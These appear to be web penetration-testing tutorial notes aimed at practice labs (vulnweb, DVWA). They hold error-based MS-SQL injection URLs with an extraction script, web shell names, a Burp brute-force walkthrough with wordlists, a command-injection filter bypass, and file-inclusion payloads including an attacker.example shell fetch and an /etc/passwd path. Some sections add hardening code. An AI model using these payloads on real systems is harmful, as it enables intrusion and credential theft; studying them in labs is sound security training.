Error Based Injection
---------------------
Error Based Injection is one technique in the SQL Injection family. These notes use it against web applications written in ASP or ASPX, running on IIS with a Microsoft SQL Server (MS-SQL) database behind them.

Problems in Error Based Injection
---------------------------------
1. Unlike PHP/MySQL targets, ASP and ASPX sites are a different ball game: MS-SQL's query syntax and built-in functions differ from MySQL's.
2. MySQL's database() and version() do not exist in MS-SQL; the equivalents are db_name() and @@version.
3. ORDER BY is valid T-SQL, but the technique below never needs it (there is no column count to find).
4. UNION is valid T-SQL as well, but it is not used either: the data comes back inside an error message instead of inside the page's normal output.
5. Only one value comes back per request. You cannot dump the whole table list from information_schema.tables in one go; you take one table name at a time with TOP 1, hiding the names you already have with NOT IN (the notes call this the "LIFO", Last In First Out, rule).

Why it is known as Error Based Injection
-----------------------------------------
Because the data arrives inside an error message: the injected query forces SQL Server to convert a string (a table name, a column name, a password) to an integer, the conversion fails, and the error text, which quotes the offending value, is echoed by the ASP page.

Target: vulnweb.com, the deliberately vulnerable practice sites published by Acunetix.

It provides both MySQL- and MS-SQL-backed applications to practise against; the URLs below use testasp.vulnweb.com, the classic ASP one.

Step 1: Find a GET parameter in the site's URLs, i.e. anything of the form something=something.
http://testasp.vulnweb.com/showforum.asp?id=0

Step 2: Check the exception handling: a stray single quote should break the query and surface a database error.
http://testasp.vulnweb.com/showforum.asp?id=0'

Step 3: Check that an injected condition is evaluated (the page should behave exactly as it does for a plain id=0):
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=1;

Note: error-based extraction returns one row per request (the "LIFO", Last In First Out, rule of the notes). SELECT TOP 1 without an ORDER BY gives whichever row SQL Server returns first, so you exclude each name you have already seen with NOT IN and repeat until no error comes back.

For example, suppose the database has the following tables:
threads -> 1
teacher -> 2
classes -> 3
fee -> 4
users -> 5

Step 4: Leak the first table name.
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=convert(int,(select top 1 table_name from information_schema.tables));

Table found: threads

Step 5: Get the next table in the list by excluding the names already seen.
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('threads')));

Repeat, adding every new name to the NOT IN list (... not in ('threads','users') ... and so on), until the page stops returning a conversion error.

Target table found: users

Step 6: Get the first column of the users table.
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='users'));

First column found: uname

Step 7: Get the second column, excluding the one already seen.
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='users' and column_name not in ('uname')));

Second column found: upass

Step 8: Get the uname and upass values, again one row per request (exclude the values already seen with NOT IN in the same way).
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=convert(int,(select top 1 upass from users));


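Steps 4 to 8 are one request per name, which is tedious by hand. The following Python script is an added example (not part of the original notes) that automates the loop: it builds the convert() payload, pulls the quoted value out of SQL Server's conversion error, and feeds every name already seen back into NOT IN. It runs offline against a constructed stand-in (FakeTarget) that holds the example schema from the notes and answers with the real ADO/SQL Server error wording; the BASE_URL, the error regex and the stand-in are assumptions for illustration, and a real run would replace FakeTarget.send with an HTTP GET of the built URL.

```python
import re
from urllib.parse import quote, unquote

# Injection point from the notes (assumed still to behave as described there).
BASE_URL = "http://testasp.vulnweb.com/showforum.asp?id=0"

# The two wordings SQL Server uses when convert(int, <string>) fails; the
# offending string is quoted inside the message, which is what leaks the data:
#   2005+: Conversion failed when converting the nvarchar value 'users' to data type int.
#   2000 : Syntax error converting the nvarchar value 'users' to a column of data type int.
LEAK_RE = re.compile(
    r"converting the n?(?:var)?char value '([^']*)' to (?:a column of )?data type int",
    re.IGNORECASE,
)


def build_url(subquery):
    """Append the convert() trick from the notes to the injectable GET parameter."""
    payload = f" and 1=convert(int,({subquery}))"
    return BASE_URL + quote(payload, safe="=(),'")


def quoted_list(names):
    """Render names as a T-SQL string list, doubling any embedded single quote."""
    return ",".join("'" + n.replace("'", "''") + "'" for n in names)


def table_subquery(seen):
    q = "select top 1 table_name from information_schema.tables"
    if seen:
        q += f" where table_name not in ({quoted_list(seen)})"
    return q


def column_subquery(table, seen):
    q = ("select top 1 column_name from information_schema.columns"
         f" where table_name='{table}'")
    if seen:
        q += f" and column_name not in ({quoted_list(seen)})"
    return q


def leaked_value(body):
    """Return the string quoted in the conversion error, or None if no error came back."""
    m = LEAK_RE.search(body)
    return m.group(1) if m else None


def enumerate_names(make_subquery, send, limit=100):
    """One request per name: TOP 1 yields a single row, NOT IN hides the rows already
    seen, and the loop stops when the page stops erroring (TOP 1 of an empty set is
    NULL, and convert(int, NULL) raises nothing)."""
    seen = []
    while len(seen) < limit:
        value = leaked_value(send(build_url(make_subquery(seen))))
        if value is None or value in seen:
            break
        seen.append(value)
    return seen


class FakeTarget:
    """Constructed stand-in for showforum.asp so the loop runs offline: it holds the
    example schema from the notes and answers with the real ASP/ADO error wording."""
    TABLES = ["threads", "teacher", "classes", "fee", "users"]
    COLUMNS = {"users": ["uname", "upass"]}

    def send(self, url):
        q = unquote(url).lower()
        m = re.search(r"not in \(([^)]*)\)", q)
        excluded = set(re.findall(r"'([^']*)'", m.group(1))) if m else set()
        if "information_schema.tables" in q:
            candidates = self.TABLES
        else:
            table = re.search(r"table_name='([^']*)'", q).group(1)
            candidates = self.COLUMNS.get(table, [])
        for name in candidates:
            if name not in excluded:
                return ("Microsoft OLE DB Provider for SQL Server error '80040e07'<br>"
                        f"Conversion failed when converting the nvarchar value '{name}' "
                        "to data type int.")
        return "<html><body>Forum not found.</body></html>"  # nothing left to leak


if __name__ == "__main__":
    target = FakeTarget()
    tables = enumerate_names(table_subquery, target.send)
    print("tables:", tables)
    for t in tables:
        cols = enumerate_names(lambda seen, t=t: column_subquery(t, seen), target.send)
        print(t, "columns:", cols)
```

Two caveats the loop makes visible: a value that happens to look numeric converts cleanly and raises no error, so it is invisible to this technique unless a non-numeric character is prefixed inside the convert(); and TOP 1 without ORDER BY promises no order, which is why every name seen is excluded rather than paged through.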
Google Dorks
------------
Google Dorks are refined searches on Google and other ranking-based search engines: instead of plain keywords you type search operators into the search field that narrow the results to a particular site, URL pattern or file type.

Three main parts of any Google result:

Green : URL

Black : Content (the snippet)

Blue : Header (the page title)

inurl: restricts the search to pages whose indexed URL contains the given string.
For example: inurl:login.asp

site: restricts the search to the content of the site (domain) you place after it.
For example: site:lucideus.com

filetype: restricts the search to files with a particular extension, whether document, PDF, executable or video.
For example: pokemon filetype:sql (site: expects a domain, so a plain keyword such as pokemon goes on its own)

indexof (written as intitle:"index of"): finds open directory listings, i.e. directories whose contents, uploaded by the admin or the users of the site, are exposed by the web server.

For example: intitle:"index of" download/books/osho/

Source: https://www.exploit-db.com/google-hacking-database/
Post Parameter Injections:

POST packet:

A request whose sensitive data travels in the body, sent from the back end of the browser without anything showing in the URL.
This information is carried in the POST_DATA form.


Typical POST data:

Uploads: CV, resume, songs, video

Payment gateways

GET:

something=something in the URL

============

Tamper Data:

Firefox add-on

Used to capture requests flowing towards a server, POST_DATA included. It hooks in at the very end of the browser, just before the data travels to the server, so the fields can be edited in flight. (The original add-on was a legacy extension and does not run on Firefox 57 and later; an intercepting proxy such as Burp Suite does the same job.)


Arbitrary file | Hacker's control panel

A file crafted by the attacker so that, once uploaded to a server and executed there, it gives complete access to that server.

This is also called a shell file (web shell).
Attackers use this method for defacing websites.

Extreme access

php : C99.php, b374k.php, kikokaka.php, wsoshell.php
asp
Brute Forcing:

A way of finding the credentials for a login or other authentication by trying combinations of candidate usernames and passwords until one is accepted.

Burp Suite:

PortSwigger:

Free: 14-day trial (of the Professional edition; the Community edition is free, with a rate-limited Intruder)
Paid: $349

This is a Java-based tool (.jar); to run it your system needs Java installed (a JDK or JRE).

Username wordlist:
Administrator
Testing
hello
lucideus
security
abc
admin
palvinder
hardik
birthday
chlaak


Password wordlist:
123
testing
admin
abc123
hello
nai
btana
password


BruteForcing DVWA -> Burp Suite
===============================

Step 1: Open a fresh copy of the login page you want to brute force.

Step 2: Browser settings -> Advanced -> Network -> Settings

Step 3: Manual proxy configuration -> 127.0.0.1, port 8080

Note: clear everything in "No Proxy for"; Firefox lists localhost there by default, so traffic to a local DVWA would bypass the proxy.

Step 4: Open Burp Suite: Proxy -> Intercept -> Intercept is ON

Step 5: DVWA -> log in with random details

Step 6: Burp Suite captures the login request carrying those random details

Step 7: Select the request -> right click -> Send to Intruder

Step 8: Set Intercept to OFF

Step 9: Go to Intruder -> Positions -> Clear (removes the automatically placed markers)

Step 10: Select the value of the username field -> Add

Step 11: Select the value of the password field -> Add

Step 12: Attack type: Cluster bomb (every username is tried against every password)

Step 13: Payloads -> payload set 1 (add the values to try as the username)

Step 14: Payloads -> payload set 2 (add the values to try as the password)

Step 15: Options tab -> Grep - Match -> Clear -> Add -> "Username and/or password incorrect."

Step 16: Start attack. Sort the results by the grep-match column: the request whose response does not contain the failure string is the valid pair (check its response length as well, since a lockout or error page would also lack the string).

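The same attack scripted in Python, added here as an example (not part of the original notes and not Burp's code) to show what Cluster bomb and Grep - Match do under the hood. The form field names (username, password, Login) follow DVWA's login form, the wordlists are the two from the notes, the target is a constructed stand-in with DVWA's default admin/password account, and nothing touches the network.

```python
from itertools import product
from urllib.parse import parse_qsl, urlencode

# The two payload sets from the notes above.
USERNAMES = ["Administrator", "Testing", "hello", "lucideus", "security", "abc",
             "admin", "palvinder", "hardik", "birthday", "chlaak"]
PASSWORDS = ["123", "testing", "admin", "abc123", "hello", "nai", "btana", "password"]

# The Grep - Match string from Step 15.
FAIL_MARKER = "Username and/or password incorrect."


def login_body(username, password):
    """Form body of one login attempt. Field names follow DVWA's form (username,
    password, Login); adjust them to whatever Burp showed in the captured request."""
    return urlencode({"username": username, "password": password, "Login": "Login"})


def cluster_bomb(usernames, passwords, send, fail_marker=FAIL_MARKER, success_marker=None):
    """Burp's Cluster bomb: every value of set 1 against every value of set 2.
    A hit is a response without the failure string and, when one is given, with the
    success string as well (a lockout or error page also lacks the failure string)."""
    hits = []
    attempts = 0
    for u, p in product(usernames, passwords):
        attempts += 1
        body = send(login_body(u, p))
        if fail_marker in body:
            continue
        if success_marker is not None and success_marker not in body:
            continue
        hits.append((u, p))
    return hits, attempts


def fake_dvwa_login(form_body):
    """Constructed target that mimics DVWA's brute-force page with its default
    admin/password account; no network is touched."""
    fields = dict(parse_qsl(form_body))
    if fields.get("username") == "admin" and fields.get("password") == "password":
        return "<p>Welcome to the password protected area admin</p>"
    return "<pre><br />Username and/or password incorrect.</pre>"


if __name__ == "__main__":
    hits, attempts = cluster_bomb(USERNAMES, PASSWORDS, fake_dvwa_login,
                                  success_marker="Welcome to the password protected area")
    print(f"{attempts} requests, valid credentials: {hits}")
```

Why the success marker matters: grep-matching on the failure string alone flags every response that lacks it, so a lockout page or a server error would be reported as a hit. Newer DVWA releases also add a per-request CSRF token (user_token) to login.php; each attempt then has to fetch and include a fresh token, which in Burp is done with a Recursive grep payload.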
=============================================

Command Execution Vulnerability:
-------------------------------

If a site offers a function such as ping or tracert (anything that passes your input to a system command), test it for this vulnerability.

DVWA: Level - Low

No filtering: the input is appended to the ping command exactly as typed.

Chaining operator: && (by analogy with UNION merging two queries, && merges two commands: the second runs if the first succeeds)

ping 172.16.3.2 && ping www.google.com


Medium:

&& -> removed
; -> removed

The filter deletes "&&" first and ";" second, one pass each, so a ";" placed inside the operator protects it during the first pass and is stripped in the second, leaving "&&" intact for the shell:

ping 172.16.3.2 &;& ping www.google.com

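Why the Medium bypass works, shown as an added Python example (not DVWA's own code, which is PHP): dvwa_medium_filter replicates the Medium blacklist's str_replace of '&&' and then ';', shell_line_* show the command line the shell receives, and hardened_argv shows the allowlist alternative. The "ping -c 4" prefix is what DVWA uses on Linux; hostnames such as www.google.com are deliberately rejected by the hardened version, since only IP addresses pass its check.

```python
import ipaddress
import re
import subprocess


def dvwa_medium_filter(target):
    """Replica of DVWA Medium's blacklist: str_replace(['&&', ';'], '', $target),
    i.e. '&&' is deleted first, then ';', one pass each and no second look."""
    for bad in ("&&", ";"):
        target = target.replace(bad, "")
    return target


def shell_line_low(target):
    """What DVWA Low hands to the shell on Linux: the input is appended as typed."""
    return "ping -c 4 " + target


def shell_line_medium(target):
    """The same command line after the Medium filter."""
    return "ping -c 4 " + dvwa_medium_filter(target)


def commands_seen_by_shell(line):
    """Rough split on the shell's chaining operators (&&, ||, ;, |, &) to show how
    many separate commands the shell would run; enough for the ping payloads here."""
    return [c.strip() for c in re.split(r"&&|\|\||[;|&]", line) if c.strip()]


def is_valid_target(target):
    """Allowlist check: the value must parse as an IPv4 or IPv6 address."""
    try:
        ipaddress.ip_address(target.strip())
        return True
    except ValueError:
        return False


def hardened_argv(target):
    """Allowlist instead of blacklist: a literal IP address, passed as its own argv
    element so no shell ever interprets it."""
    if not is_valid_target(target):
        raise ValueError("not an IP address: " + target)
    return ["ping", "-c", "4", str(ipaddress.ip_address(target.strip()))]


def run_ping(target):
    """shell=False: the argv list goes straight to execve; operators are just bytes."""
    return subprocess.run(hardened_argv(target), capture_output=True, text=True, check=False)


if __name__ == "__main__":
    for payload in ["172.16.3.2 && ping www.google.com", "172.16.3.2 &;& ping www.google.com",
                    "172.16.3.2 | id"]:
        print(payload, "->", commands_seen_by_shell(shell_line_medium(payload)))
    print(hardened_argv("172.16.3.2"))
```

The "|" case shows why a blacklist keeps losing: the Medium filter never mentions the pipe, so "172.16.3.2 | id" passes unchanged and still yields two commands.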
File Execution Vulnerability
---------------------------

www.bank.com/video.php?include=www.youtube.com/

If the include parameter is handed straight to PHP's include(), the server fetches and executes whatever the value points at: a remote URL (remote file inclusion, which needs allow_url_include enabled in php.ini) or, with ../ sequences, any local file the web server can read (local file inclusion).
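An added Python example (not the bank site's code, which the notes only sketch as a URL) of the resolver an include= parameter should pass through before anything is included: URLs and stream wrappers are refused, the normalised path must stay under an assumed INCLUDE_ROOT, and only .php fragments qualify. vulnerable_include_target is the behaviour the URL above implies; safe_include_target is the hardened form.

```python
import posixpath
from urllib.parse import urlparse

# Assumed directory holding the page fragments video.php is meant to include.
INCLUDE_ROOT = "/var/www/bank/includes"


def vulnerable_include_target(user_value):
    """What video.php?include=... does when the parameter goes straight into
    include(): the value is used as-is, URL or not."""
    return user_value


def safe_include_target(user_value):
    """Resolve an include name or raise ValueError.
    Refuses null bytes, anything with a scheme (http://, php://, data:// ...),
    protocol-relative or www. values, paths that normalise outside INCLUDE_ROOT
    and files that are not .php fragments."""
    if "\x00" in user_value:
        raise ValueError("null byte in include name")
    if urlparse(user_value).scheme or user_value.startswith(("//", "www.")):
        raise ValueError("remote include refused: " + user_value)
    full = posixpath.normpath(posixpath.join(INCLUDE_ROOT, user_value))
    # commonpath rather than startswith: "/var/www/bank/includes2/x.php" would
    # pass a prefix check but is not under INCLUDE_ROOT.
    if posixpath.commonpath([INCLUDE_ROOT, full]) != INCLUDE_ROOT:
        raise ValueError("path escapes the include root: " + user_value)
    if not full.endswith(".php"):
        raise ValueError("only .php fragments may be included: " + user_value)
    return full


def is_safe_include(user_value):
    try:
        safe_include_target(user_value)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for v in ["player.php", "www.youtube.com/", "http://attacker.example/shell.txt",
              "../../../../etc/passwd", "php://filter/convert.base64-encode/resource=index.php"]:
        print(f"{v!r}: {'allowed' if is_safe_include(v) else 'refused'}")
```

A fixed map from a short page name to a file under the root is stricter still and is the better choice when the set of includable fragments is known in advance; the resolver above is for the case where the file name itself must come from the request.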